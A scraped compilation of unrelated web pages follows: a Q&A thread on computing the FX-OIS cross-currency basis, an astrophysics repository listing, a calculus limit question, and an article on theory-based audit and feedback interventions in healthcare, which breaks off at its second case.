Addition: I want to articulate the mechanics of what we are doing - we are borrowing/lending an amount of fixed currency X, against which we are then lending/borrowing a variable amount of currency Y - so we need to know what the effective term deposit/lending rate in each currency is. Given one leg of an FX swap is normally fixed, the difference for the market maker is cleared in the spot market such that the future amount is the fixed notional also, but this adds/subtracts from the notional of the variable amount, which is why the points have some sensitivity to the absolute level of the spot rate.
## 2 Answers
Implied FX-OIS basis should be pretty simple to "compute", it is the classical "Cross-currency" basis observed in FX Swaps & FX Forwards, that can be backed out when plugging in OIS rates (instead of Libor rates).
## No Arbitrage between FX Spot & FX Forwards:
Taking EUR/USD as an example, we must have for no arbitrage:
$$(1+r_{EUR}) F_{EUR/USD}=S_{EUR/USD}(1+r_{USD}+r_{basis})$$
In words: on the LHS, you take 1 EUR and deposit it into an EUR interest account, then convert it to USD at the end of the interest-baring period using a Forward.
This has to equal in value to the RHS: here, you convert 1 EUR into USD at spot and deposit in into a USD interest account for the same period of time as the Forward maturity on the LHS.
For clarity: $$S_{EUR/USD}$$ is the spot, $$F_{EUR/USD}$$ is the forward.
## Using forwards for funding in foreign currency:
What is the $$r_{basis}$$ term? We can understand that term better if we invert the equation above as follows, to get:
$$(1+r_{USD}+r_{basis})=(1+r_{EUR})\left(\frac{F_{EUR/USD}}{S_{EUR/USD}}\right)$$
Imagine someone has access to EUR currency and wants to use it to obtain USD "funding" for a specific period of time (say 1 year): they know the interest rate $$r_{EUR}$$ at which they can raise the EUR (which is their domestic currency). They also know the FX Spot between EUR and USD (i.e. $$S_{EUR/USD})$$ and the 1-year FX Forward rate between EUR and USD (i.e. $$F_{EUR/USD})$$.
In other words, they can obtain EUR, exchange the EUR for USD at spot and using the 1-y Forward, they can lock into an implied "USD interest rate": the interest rate they will effectively have to "pay" to get access to USD funding for the duration of 1-year.
Someone who has access to USD and wants to obtain funding in EUR for a fixed period of time can the the same in reverse:
$$(1+r_{EUR})=(1+r_{USD}+r_{basis})\left(\frac{S_{EUR/USD}}{F_{EUR/USD}}\right)$$
They can lock into an EUR interest rate, when funding the EUR using their domestic USD currency.
Usually, institutions fund themselves at OIS rates: so the USD institution that has access to USD as their domestic currency could raise this at USD-OIS, whilst the European institution that has access to EUR currency could raise thiis at EUR-OIS.
If the demand for USD via EUR funding is in perfect equilibrium with the demand for EUR via USD funding, the term $$r_{basis}$$ would be zero. But this is hardly the case: the EUR/USD basis changes all the time in line with the prevailing demand for the funding in one currency against the other.
The EUR/USD basis is typically a few BPS (last time I looked it was 17bps added onto the EUR leg, which showed increased demand for EUR funding vs. USD funding).
Btw: te basis term $$r_{basis}$$ described above is directly tradable for maturities longer than 1y via Cross-Currency Swaps. For maturities shorter than 1y (for which Cross-Currency swaps don't trade), it is indirectly reflected in the FX Forwards via the equations above.
## Summary:
$$r_{basis}$$ reflects the prevailing demand for funding in one currency via another currency, for a fixed period of time (term). Each term (i.e. 6m, 1y, 5y, etc) would have it's own $$r_{basis}$$. When OIS rates are used in the equations above, you can back out the Xccy-OIS basis. If Libor rates are used instead, you can back out Libor-Xccy basis.
So in conclusion, taking 6-month tenor as an example: you know the 6m EUR-OIS rate, the 6m USD-OIS rate, the EUR/USD Spot and the 6m EUR/USD Forward: when you plug all of these into the equations above, you can back out the 6m FX-OIS basis for EUR/USD (and you can do this for any other tenor or currency).
FX-OIS basis, depending on the fx pair, basically means, the implied yield vs the OIS basis of the currency pair.
ON JPY trading at parity: USDJPY offered or bid at "0"
1W implied OIS basis moved 70BP: depending if its downward move or upward move, its trading +-70bp vs OIS basis. Upward, therefore, demand for JPY inched up, vice versa demand for USD fell, what that translates to is JPY borrowing cost is now higher vs last point its refereed to. Therefore, now the pricing is USDJPY 1w (previous offered level + 70bp), the opposite will occur if borrowing cost rose for USD.
• "FX-OIS basis, depending on the fx pair, basically means, the implied yield vs the OIS basis of the currency pair." Do you mean for example (3m AUDUSD rate implied from FX swaps) less (3m AUD OIS)? What does the difference/basis represent? Feb 28 at 13:44 |
# Other Astrophysics and Astronomy Commons™
## All Articles in Other Astrophysics and Astronomy
309 full-text articles. Page 1 of 11.
2020 San Jose State University
#### Computational Astronomy: Classification Of Celestial Spectra Using Machine Learning Techniques, Gayatri Milind Hungund
##### Master's Projects
Lightyears beyond the Planet Earth there exist plenty of unknown and unexplored stars and Galaxies that need to be studied in order to support the Big Bang Theory and also make important astronomical discoveries in quest of knowing the unknown. Sophisticated devices and high-power computational resources are now deployed to make a positive effort towards data gathering and analysis. These devices produce massive amount of data from the astronomical surveys and the data is usually in terabytes or petabytes. It is exhaustive to process this data and determine the findings in short period of time. Many details can be missed ...
Automated Spectroscopic Detection And Mapping Using Alma And Machine Learningtechniques, 2020 Southern Methodist University
#### Automated Spectroscopic Detection And Mapping Using Alma And Machine Learningtechniques, Steven Cocke, Andrew Wilkins, Josephine Mcdaniel, John Santerre, Conor Nixon
##### SMU Data Science Review
In this paper we present a methodology for automating theclassification of spectrally resolved observations of multiple emissionlines with the Atacama Large Millimeter/submillimeter Array (ALMA).Molecules in planetary atmospheres emit or absorb different wavelengthsof light thereby providing a unique signature for each species. ALMAdata were taken from interferometric observations of Titan made be-tween UT 2012 July 03 23:22:14 and 2012 July 04 01:06:18 as part ofALMA project 2011.0.00319.S. We first employed a greedy set cover algorithm to identify the most probable molecules that would reproducethe set of frequencies with respective flux greater than ...
Title: Fully Interactive And Refined Resolution Simulations Of The Martian Dust Cycle By The Marswrf Model, 2020 United Arab Emirates University
#### Title: Fully Interactive And Refined Resolution Simulations Of The Martian Dust Cycle By The Marswrf Model, Claus Gebhardt, Abdelgadir Abuelgasim, Ricardo M. Fonseca, Javier Martín-Torres, Maria-Paz Zorzano
##### National Space Science & Technology Center Datasets
The Mars climate model MarsWRF was run with fully interactive dust parametrization, assuming an infinite surface dust reservoir. Changing the horizontal resolution from 5°×5° to 2°×2° produced different dust cycle variability and dust source regions. The higher spatial resolution allowed for a better representation of the surface topography and associated surface dust lifting by wind stress, that is more consistent with observations. Global Dust Storm Events typically occurred if dust storm activity at northern Hellas Planitia connected with that at southern Chryse Planitia.
2020 Michigan Technological University
#### Cosmic-Ray Acceleration In The Cygnus Ob2 Stellar Association, Binita Hona
##### Dissertations, Master's Theses and Master's Reports
The Cygnus region of our Galaxy consists of an active star forming region and a wealth of various astrophysical sources such as pulsar wind nebulae (PWN), supernova remnants (SNRs), and massive star clusters. Massive stellar clusters and associations have been postulated as possible sources of cosmic rays (CRs) in our Galaxy. One example of a gamma-ray source associated with a stellar association lies in the Cygnus region known as the "Cygnus Cocoon". It is an extended region of gamma-ray emission in the Cygnus X region and attributed to a possible superbubble with freshly accelerated CRs which are hypothesized to produce ...
New Foundation In The Sciences: Physics Without Sweeping Infinities Under The Rug, 2019 University of New Mexico
#### New Foundation In The Sciences: Physics Without Sweeping Infinities Under The Rug, Florentin Smarandache, Victor Christianto, Robert Neil Boyd
##### Mathematics and Statistics Faculty and Staff Publications
It is widely known among the Frontiers of physics, that “sweeping under the rug” practice has been quite the norm rather than exception. In other words, the leading paradigms have strong tendency to be hailed as the only game in town. For example, renormalization group theory was hailed as cure in order to solve infinity problem in QED theory. For instance, a quote from Richard Feynman goes as follows: “What the three Nobel Prize winners did, in the words of Feynman, was "to get rid of the infinities in the calculations. The infinities are still there, but now they can ...
2019 Georgia College and State University
#### #7 - Cluster Characterization And Veto Analysis Of The Frequencyhough All-Sky Continuous Gravitational Wave Search, Cain Gantt, Pia Astone
##### Georgia Undergraduate Research Conference (GURC)
Continuous gravitational waves (CWs) can be produced by rotating neutron stars with an asymmetric mass distribution about their axis of rotation. The FrequencyHough search is an all-sky search for these signals, and the large parameter space considered introduces computational limits into the pipeline. We investigate the distributions of candidates produced by earlier stages in the pipeline, and propose the mechanisms within the pipeline that produce these effects. We also characterize the performance of two steps, a veto and ranking procedure, used to reduce the number of candidates within the FrequencyHough pipeline. We found the distance metric in the parameter space ...
Galaxy And Mass Assembly: A Comparison Between Galaxy-Galaxy Lens Searches In Kids/Gama, 2019 University of Louisville
#### Galaxy And Mass Assembly: A Comparison Between Galaxy-Galaxy Lens Searches In Kids/Gama, Shawn Knabel, Benne Holwerda
##### Posters-at-the-Capitol
Strong gravitational lenses are cases where a distant background galaxy is located directly behind a massive foreground galaxy, whose gravity causes the light from the background galaxy to bend around the foreground galaxy. In addition to being visually stunning, these rare events are useful laboratories for furthering our understanding of gravity and cosmology and to determine properties, such as the mass and dark matter content, of the lensing galaxies themselves. The trouble is finding enough of these strong gravitational lenses for further study. The immensity of the catalogs being collected by state-of-the-art telescopes requires equally innovative methods for interpreting that ...
Large‐Amplitude Mountain Waves In The Mesosphere Observed On 21 June 2014 During Deepwave: 1.Wave Development, Scales, Momentum Fluxes, And Environmental Sensitivity, 2019 Utah State University
#### Large‐Amplitude Mountain Waves In The Mesosphere Observed On 21 June 2014 During Deepwave: 1.Wave Development, Scales, Momentum Fluxes, And Environmental Sensitivity, Michael J. Taylor, Pierre-Dominique Pautet, David C. Fritts, Bernd Kaifler, Steven M. Smith, Yucheng Zhao, Neal R. Criddle, Pattilyn Mclaughlin, William R. Pendleton Jr., Michael P. Mccarthy, Gonzalo Hernandez, Stephen D. Eckermann, James Doyle, Markus Rapp, Ben Liley, James M. Russell Iii
##### Publications
A remarkable, large‐amplitude, mountain wave (MW) breaking event was observed on the night of 21 June 2014 by ground‐based optical instruments operated on the New Zealand South Island during the Deep Propagating Gravity Wave Experiment (DEEPWAVE). Concurrent measurements of the MW structures, amplitudes, and background environment were made using an Advanced Mesospheric Temperature Mapper, a Rayleigh Lidar, an All‐Sky Imager, and a Fabry‐Perot Interferometer. The MW event was observed primarily in the OH airglow emission layer at an altitude of ~82 km, over an ~2‐hr interval (~10:30–12:30 UT), during strong eastward winds ...
Searching For Trends In Atmospheric Compositions Of Extrasolar Planets, 2019 Humboldt State University
#### Searching For Trends In Atmospheric Compositions Of Extrasolar Planets, Kassandra Weber, Paola Rodriguez Hidalgo, Adam Turk, Troy Maloney, Stephen Kane
##### IdeaFest: Interdisciplinary Journal of Creative Works and Research from Humboldt State University
No abstract provided.
To Apply Or Not To Apply: A Survey Analysis Of Grant Writing Costs And Benefits, 2019 Embry-Riddle Aeronautical University
#### To Apply Or Not To Apply: A Survey Analysis Of Grant Writing Costs And Benefits, Ted Von Hippel, Courtney Von Hippel
##### Ted von Hippel
We surveyed 113 astronomers and 82 psychologists active in applying for federally funded research on their grant-‐writing history between January, 2009 and November, 2012. We collected demographic data, effort levels, success rates, and perceived non-‐financial benefits from writing grant proposals. We find that the average proposal takes 116 PI hours and 55 CI hours to write; although time spent writing was not related to whether the grant was funded. Effort did translate into success, however, as academics who wrote more grants received more funding. Participants indicated modest non-‐monetary benefits from grant writing, with psychologists reporting a somewhat ...
Hyper Wide Field Imaging Of The Local Group Dwarf Irregular Galaxy Ic 1613: An Extended Component Of Metal-Poor Stars, 2019 University of Arizona
#### Hyper Wide Field Imaging Of The Local Group Dwarf Irregular Galaxy Ic 1613: An Extended Component Of Metal-Poor Stars, Ragadeepika Pucha, Jeffrey L. Carlin, Beth Willman, Jay Strader, David J. Sand, Keith Bechtol, Jean P. Brodie, Denija Crnojević, Duncan A. Forbes, Christopher Garling, Jonathan Hargis, Annika H.G. Peter, Aaron J. Romanowsky
##### Aaron J. Romanowsky
Stellar halos offer fossil evidence for hierarchical structure formation. Since halo assembly is predicted to be scale-free, stellar halos around low-mass galaxies constrain properties such as star formation in the accreted subhalos and the formation of dwarf galaxies. However, few observational searches for stellar halos in dwarfs exist. Here we present gi photometry of resolved stars in isolated Local Group dwarf irregular galaxy IC 1613 (M sstarf ~ 108 M ⊙). These Subaru/Hyper Suprime-Cam observations are the widest and deepest of IC 1613 to date. We measure surface density profiles of young main-sequence, intermediate to old red giant branch, and ancient ...
Spatially Resolved Stellar Kinematics Of The Ultra-Diffuse Galaxy Dragonfly 44. I. Observations, Kinematics, And Cold Dark Matter Halo Fits, 2019 Yale University
#### Spatially Resolved Stellar Kinematics Of The Ultra-Diffuse Galaxy Dragonfly 44. I. Observations, Kinematics, And Cold Dark Matter Halo Fits, Pieter Van Dokkum, Asher Wasserman, Shany Danieli, Roberto Abraham, Jean Brodie, Charlie Conroy, Duncan A. Forbes, Christopher Martin, Matt Matuszewski, Aaron J. Romanowsky, Alexa Villaume
##### Aaron J. Romanowsky
We present spatially resolved stellar kinematics of the well-studied ultra-diffuse galaxy (UDG) Dragonfly 44, as determined from 25.3 hr of observations with the Keck Cosmic Web Imager. The luminosity-weighted dispersion within the half-light radius is ${\sigma }_{1/2}={33}_{-3}^{+3}$ km s−1, lower than what we had inferred before from a DEIMOS spectrum in the Hα region. There is no evidence for rotation, with ${V}_{\max }/\langle \sigma \rangle \lt 0.12$ (90% confidence) along the major axis, in possible conflict with models where UDGs are the high-spin tail of the normal dwarf galaxy ...
2019 California Polytechnic State University, San Luis Obispo
#### Brightest Cluster Galaxy Evolution Exploration: Comparing The Separation Of Cluster X-Ray Light And Visible Wavelength Galaxy Light With Spectral Data, Matthew Aaron Salinas
##### Physics
Brightest Cluster Galaxies (BCGs), the brightest galaxy in a cluster of hundreds to thousands of galaxies, are some of the biggest, brightest, and most massive galaxies in the universe. Characterizing a BCG can help discover more about galaxy evolution - the aging, changing, and possible merging (collisions) of galaxies. This project involves determining the separation of the peak of x-ray emission of the galaxy cluster, and the peak of visible emission of the BCG to characterize the system as being disturbed or undisturbed that can then lead to discoveries about its formation and evolution. We have found that 17.4% of ...
Spatially Resolved Stellar Populations And Kinematics With Kcwi: Probing The Assembly History Of The Massive Early-Type Galaxy Ngc 1407, 2019 Universitat de Barcelona
#### Spatially Resolved Stellar Populations And Kinematics With Kcwi: Probing The Assembly History Of The Massive Early-Type Galaxy Ngc 1407, Anna Ferré-Mateu, Duncan A. Forbes, Richard M. Mcdermid, Aaron J. Romanowsky, Jean P. Brodie
##### Aaron J. Romanowsky
Using the newly commissioned Keck Cosmic Web Imager (KCWI) instrument on the Keck II telescope, we analyze the stellar kinematics and stellar populations of the well-studied massive early-type galaxy (ETG) NGC 1407. We obtained high signal-to-noise integral field spectra for a central and an outer (around one effective radius toward the southeast direction) pointing with integration times of just 600 s and 2400 s, respectively. We confirm the presence of a kinematically distinct core also revealed by VLT/MUSE data of the central regions. While NGC 1407 was previously found to have stellar populations characteristic of massive ETGs (with radially ...
Figure 8: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 8: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 3: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 3: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 5: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 5: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 9: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 9: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 2: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 2: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided.
Figure 10: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, 2019 Embry-Riddle Aeronautical University
#### Figure 10: Simulation Results For Flux Tube Entropy And Specific Entropy In Saturn's Magnetosphere, Xuanye Ma, Peter A. Delamere, Michelle F. Thomsen, Antonius Otto, Bishwa Neupane, Brandon Burkholder, Katariina Nykyri
##### Katariina Nykyri
No abstract provided. |
SEARCH HOME
Math Central Quandaries & Queries
Question from Soham: Find out the value of the following: lim (x+x^2 +x^3 +.........x^n–n)/(x–1) x→1
Hi Soham,
Write the numerator as
$\left(x - 1\right) + \left(x^2 - 1\right) + \left(x^3 - 1\right) + \cdot \cdot \cdot + \left(x^n - 1\right).$
In the expression above each of the terms
$\left(x^k - 1\right)$
can be factored.
Can you complete the problem now?
Penny
Math Central is supported by the University of Regina and The Pacific Institute for the Mathematical Sciences. |
Article Text
Theory-based and evidence-based design of audit and feedback programmes: examples from two clinical intervention studies
1. Sylvia J Hysong1,2,
2. Harrison J Kell3,
3. Laura A Petersen1,2,
4. Bryan A Campbell4,
5. Barbara W Trautner1,2
1. 1Center for Innovations in Quality, Effectiveness and Safety, Michael E. DeBakey VA Medical Center, Houston, Texas, USA
2. 2Baylor College of Medicine, Houston, Texas, USA
3. 3Educational Testing Service, Morrisville, Pennsylvania, USA
4. 4Normal Modes, Durham, North Carolina, USA
1. Correspondence to Dr Sylvia Hysong, Center for Innovations in Quality, Effectiveness and Safety, Michael E. DeBakey VA Medical Center, Houston TX 77030, USA; Hysong{at}bcm.edu
## Abstract
Background Audit and feedback (A&F) is a common intervention used to change healthcare provider behaviour and, thus, improve healthcare quality. Although A&F can be effective its effectiveness varies, often due to the details of how A&F interventions are implemented. Some have suggested that a suitable conceptual framework is needed to organise the elements of A&F and also explain any observed differences in effectiveness. Through two examples from applied research studies, this article demonstrates how a suitable explanatory theory (in this case Kluger & DeNisi's Feedback Intervention Theory (FIT)) can be systematically applied to design better feedback interventions in healthcare settings.
Methods Case 1: this study's objective was to reduce inappropriate diagnosis of catheter-associated urinary tract infections (CAUTI) in inpatient wards. Learning to identify the correct clinical course of action from the case details was central to this study; consequently, the feedback intervention featured feedback elements that FIT predicts would best activate learning processes (framing feedback in terms of group performance and providing of correct solution information). We designed a highly personalised, interactive, one-on-one intervention with healthcare providers to improve their capacity to distinguish between CAUTI and asymptomatic bacteruria (ASB) and treat ASB appropriately. Case 2: Simplicity and scalability drove this study's intervention design, employing elements that FIT predicted positively impacted effectiveness yet still facilitated deployment and scalability (eg, delivered via computer, delivered in writing). We designed a web-based, report-style feedback intervention to help primary care physicians improve their care of patients with hypertension.
Results Both studies exhibited significant improvements in their desired outcome and in both cases interventions were received positively by feedback recipients.
Summary A&F has been a popular, yet inconsistently implemented and variably effective tool for changing healthcare provider behaviour and, improving healthcare quality. Through the systematic use of theory such as FIT, robust feedback interventions can be designed that yield greater effectiveness. Future work should look to comparative effectiveness of specific design elements and contextual factors that identify A&F as the optimal intervention to effectuate healthcare provider behaviour change.
Trial registration number NCT01052545, NCT00302718; post-results.
• Audit and feedback
• Health services research
• Quality improvement methodologies
## Request Permissions
If you wish to reuse any or all of this article please use the link below which will take you to the Copyright Clearance Center’s RightsLink service. You will be able to get a quick price and instant permission to reuse the content in many different ways.
## Background
Audit and feedback (A&F) is a common intervention for changing healthcare provider behaviour and improving healthcare quality.1 ,2 A&F can be defined as ‘a summary of clinical performance (audit) over a specific period of time, and the provision of that summary (feedback) to individual practitioners, teams, or healthcare organizations.’3 A&F is an appealing intervention because of its seemingly straightforward approach to behaviour change: by receiving current information about their performance (‘knowledge of results’), providers are more motivated to improve.4 ,5 A&F has been used to improve a wide range of behaviours in clinical practice across many settings,2 making it highly flexible. Further, A&F is often the first step in awarding financial incentives to providers; consequently, the design and implementation of an A&F intervention can materially impact quality of care, as well as costs for patients, providers and healthcare organisations.6 Thus, the nature and characteristics of both the outcome and the feedback intervention must be considered to achieve the desired results.
Studies within healthcare including a Cochrane review suggest that A&F can improve patient care effectively;2 however, others have found that A&F varies in effectiveness and have attributed this inconsistency to the design of specific interventions.2 Many A&F studies inadequately describe their interventions and do not detail their underlying causal processes, making it difficult to compare feedback interventions across different healthcare settings.1
Theory and conceptual frameworks are important yet underused tools in healthcare for successfully designing behaviour-change interventions. Michie and Abraham7 posit that, to design interventions that truly change behaviour, one must rely on empirically supported theories of behaviour change that identify both psychological antecedents and operating mechanisms of behaviour change. This contention is echoed in the A&F literature. Foy and colleagues suggest a conceptual framework is needed to organise the elements of A&F and explain observed differences in effectiveness.1 Ivers et al8 contend that using theory in designing, implementing or interpreting A&F interventions can help clarify the behavioural causal pathways and their underlying mechanisms, resulting in more effective feedback interventions. Unfortunately, explicit use of theories to design A&F interventions is rare, with little consensus as to appropriate theories.3
Another potential problem is that not all theories are well suited to aid in intervention design; at minimum, the theory must clearly describe the mechanism behind the behaviour change and be supported by independent work.7 For example, Rogers' Diffusion of Innovation Theory9 and Bandura's Social Cognitive Theory10 have been reported as the two theories most often used in A&F intervention design. Yet, the suitability of these theories for this purpose has been questioned due to their lack of specificity.3 Similarly, implementation-oriented frameworks such as PARIHSi can guide contextual factors to be considered to ensure successful implementation; however, they may not be able to help identify the kinds of features an intervention requires to be optimally effective in a given context or across multiple contexts. Often, it is necessary to draw from numerous theories to accomplish that goal. In the case of A&F, Kluger and DeNisi11 have already conducted such a synthesis to produce Feedback Intervention Theory (FIT). Specifically designed for explaining feedback's operating mechanisms, FIT draws from cognitive and motivational theories to formulate its tenets, including control theory,12 ,13 goal-setting theory,14 multiple-cue probability learning paradigm,15 social cognition10 and learnt helplessness theory, to offer clear propositions for how feedback works and what cues are likely to improve feedback effectiveness. Through two examples from applied research studies using FIT-based feedback interventions, the present article demonstrates how FIT can be systematically applied in healthcare settings to design better feedback interventions.
## Feedback intervention theory: a brief primer
According to FIT, people regulate their behaviour by comparing it to goals, standards or benchmarks to which they have committed.14 When they observe a discrepancy between the standard and their actual behaviour, they try to resolve it by adjusting their level of effort to increase the likelihood that the benchmark will be met; the degree of increased effort an individual will undertake can be altered by providing performance feedback. For example, physicians who prescribe a particular medication for a given condition are likely to continue prescribing it until some external influence, such as a patient request for a cheaper alternative, compels them to change. Since individuals' attention is limited, only gaps receiving attention have the potential for change; for example, an alert in the computerised prescription order-entry system could bring a cheaper medication to the physician's attention, thereby increasing the likelihood of switching to the new medication. Thus, feedback interventions work by providing new information that redirects recipients' locus of attention either away from the task (eg, towards ourselves or towards irrelevant tasks) or towards the task. Kluger and DeNisi propose that three factors determine how effectively this attentional shift occurs: characteristics of the feedback itself (or ‘feedback intervention cues’), the nature of the task (‘task characteristics), and personality and situational variables.11 Feedback cues determine the direction towards which attention will likely shift; task characteristics determine how susceptible the task is to attentional shifts, and personality and situational variables determine how the feedback recipient chooses to change once the attentional shift occurs.
According to FIT, feedback cues that redirect the locus of attention towards the task itself reinforce extant motivational processes, thereby strengthening feedback's effect on task performance; similarly, cues that redirect attention towards details of the task tend to promote learning and also strengthen feedback's effect on task performance; conversely, information that shifts attention away from the task diverts cognitive resources away from trying to improve, thereby weakening feedback's effect.11 Figure 1 graphically depicts the basic tenets of FIT.
Figure 1
Schematic of tenets of Feedback Intervention Theory.
Kluger and DeNisi,11 Hysong16 and Ivers et al2 independently found via meta-analysis that feedback has a generally moderate effect on performance. Additionally, the Kluger and DeNisi and the Hysong meta-analyses explicitly tested the tenets of FIT and identified several feedback intervention characteristics that enhance feedback effectiveness, including correct solution information (information about how to do the task correctly), velocity (change from last period of measurement), graphical or written presentation formats, inclusion of normative information, neutral tone and other goal-setting components. Characteristics found to decrease feedback effectiveness included discouraging tone, praiseful tone and verbal feedback.11 Table 1 summarises and defines characteristics predicted by FIT to impact feedback effectiveness, and the effect reported by each meta-analysis. As shown in this table, these three independent meta-analyses exhibit several parallels. Although theory and evidence seem to disagree about which elements of feedback are ineffective, there appears to be good congruence about the more effective elements of feedback. Due to its versatile framework and demonstrable improvements in A&F effectiveness both inside and outside healthcare settings,17–19 FIT is a suitable guide for the design of A&F interventions across a variety of contexts.
Table 1
Factors predicted to impact feedback effectiveness by Feedback Intervention Theory and by Cochrane systematic review
The following case examples demonstrate how the principles of FIT were applied to design A&F interventions for two different healthcare scenarios, both of which led to improvements in two different healthcare quality outcomes. As the theory provides the most guidance about the effectiveness of feedback intervention cues, and feedback design is the element over which organisations and researchers have the most control, the cases concentrate on the feedback cues selected in the design of the feedback intervention.
## Case 1: Reducing inappropriate diagnosis of catheter-associated urinary tract infection via case-specific feedback
We employed FIT to design an A&F intervention in the United States Department of Veterans Affairs Veterans Health Administration (VHA) to improve internal medicine resident and long-term care personnel's capacity to distinguish between asymptomatic bacteriuria (ASB) and catheter-associated urinary tract infection (CAUTI). ASB is frequently misdiagnosed as CAUTI, often leading to unnecessary use of antibiotics, in turn leading to resistant organisms, unnecessary cost, prolonged hospital stays and infections such as Clostridium difficile-associated disease.20 Details of the CAUTI study's design, including the A&F intervention, are published elsewhere;21 highlights are summarised here.
### Participants
The A&F intervention was applied to 169 healthcare providers who make the decision to order a urine culture and prescribe antibiotics for a positive urine culture in two types of hospital units: acute-care medicine wards and long-term care units. In the acute-care medicine wards, internal medicine residents (trainees), usually interns or second-year residents, were generally responsible for making decisions about prescribing antibiotics for positive urine cultures, under supervision from a rotating pool of attending physicians. In the extended-care ward, the A&F intervention targeted the nurse practitioners, physician assistants and staff physicians who comprised the providers responsible for prescribing antibiotics for positive urine cultures.
### Intervention
The intervention was based on a treatment algorithm derived from the Infectious Diseases Society of America guidelines for the non-treatment of ASB. This treatment algorithm describes steps providers should take when confronted with a patient with an indwelling urinary catheter and a subsequent positive urine culture.22 All participants' cases involving positive urine cultures were identified via a comprehensive chart review and examined by trained research staff for errors in diagnosis and treatment of ASB cases (defined as deviations from the treatment algorithm). For each clinician, the team identified a subset of cases that would teach the guideline principles clearly, keeping the ratio of erroneously to correctly managed cases to approximately 1:2. Research staff contacted the clinical providers involved to deliver the feedback intervention face to face, which consisted of a one-on-one feedback session reviewing each ASB case. For each case, an interactive hyperlinked PowerPoint presentation was used as an explanatory device during the feedback meeting (see online supplementary appendix A) and given to participants to keep.
### Intervention design considerations
In developing the algorithm to be used for classifying cases in the study, we learnt that clinicians routinely caring for patients with urinary catheters use mental models that often deviate from guidelines when classifying cases of catheter-associated bacteriuria as either ASB or CAUTI.22 Thus, designing an intervention that shifted attention to the details of the task and fostered better learning of the guideline so that physicians' mental models could be altered was paramount. This drove our design over other factors, such as labour intensiveness or wide-scale deployment capabilities (all participants were physicians at local hospitals within 1.5 miles of each other and the research team). To accomplish our goal, we opted for an interactive, computer-based presentation of feedback, which FIT predicts would be less likely to shift attention away from the task than simple verbal presentation. The presentation's interactive nature was also intended to shift attention to the details of the task: it showed the physician the specific decision path he or she took, highlighted correct and incorrect decisions (a step towards correct-solution information) and provided correct solution information (one of the most effective cues according to the meta-analytic findings sizes reported earlier) by revealing the correct course of action when a participant clicked on a series of yes-or-no links in the presentation. Finally, because Ivers2 showed that providing both verbal and written feedback yielded better results than written feedback alone, research staff reviewed the treatment algorithm verbally with participants as they followed along on the interactive presentation; however, the research staff used a written, standardised but branching script to accomplish this task. The standardised script ensured that every participant received the same relevant feedback for each decision point in the diagnosis/treatment of ASB/CAUTI. Table 2 summarises how each feedback design characteristic was operationalised for the study.
Table 2
Operationalisation of feedback design characteristics Case 1
### Measures
#### Reactions to feedback
After delivering personalised feedback to individual participants, research assistants completed Smither and colleagues' 11-item scale to capture feedback recipients' reactions to their feedback, specifically targeting recipients' perceptions of the value of the feedback, the recipient's sense of obligation to use the feedback and extent to which the recipient was concerned with others' perceptions of his/her performance.24 Feedback recipients also completed questions about the clarity, usability, tolerability and degree of acceptance of feedback received.
#### Effectiveness of feedback intervention
Postintervention chart monitoring at the ward level captured the effectiveness of the A&F intervention. For 6 months after the feedback intervention was implemented, charts for each ward were monitored for adherence to the treatment algorithm, specifically, rates of urine-culture orders and inappropriate use of antibiotics.
### Results
#### Reactions to feedback
Most feedback recipients reacted positively to feedback received, indicating that they were open and accepting of the feedback and motivated to improve; mean feedback acceptance scores were high (M=5.18/7, SD=0.26), as were tolerability (M=5.81, SD=0.07) and usability scores (M=5.27, SD=0.04).
Based on research assistants' reports of recipients' reactions, the PowerPoint presentation received positive reactions, as it organised the guidelines for ASB and CAUTI classification and treatment in a simple, understandable way without loss of information fidelity. Though feedback recipients occasionally tried to justify their original decisions, the feedback session quickly turned to the evidence and a learning opportunity for the recipient.
#### Effectiveness of feedback intervention
The overall rate of urine-culture ordering in wards where participants received A&F decreased significantly during the intervention period (from 41.2 to 23.3 per 1000 bed-days; (incident rate ratio (IRR), 0.57; 95% CI 0.53 to 0.61; p<0.0001) and further during the maintenance period (12 per 1000 bed-days; IRR, 0.29; 95% CI 0.26 to 0.32; p<0.0001). At the comparison site, urine cultures ordered did not change significantly across all three periods. Overtreatment of ASB at the intervention site reduced significantly (1.6 to 0.5 per 1000 bed-days; IRR, 0.35; 95% CI 0.22 to 0.55, p<0.0001) during the intervention period; these reductions persisted (0.4 per 1000 bed-days; IRR 0.24; 95% CI 0.13 to 0.42) during the maintenance period. Overtreatment of ASB at the comparison site was similar across all time periods.25
## Case 2: Helping physicians provide guideline-recommended hypertension care via summary feedback
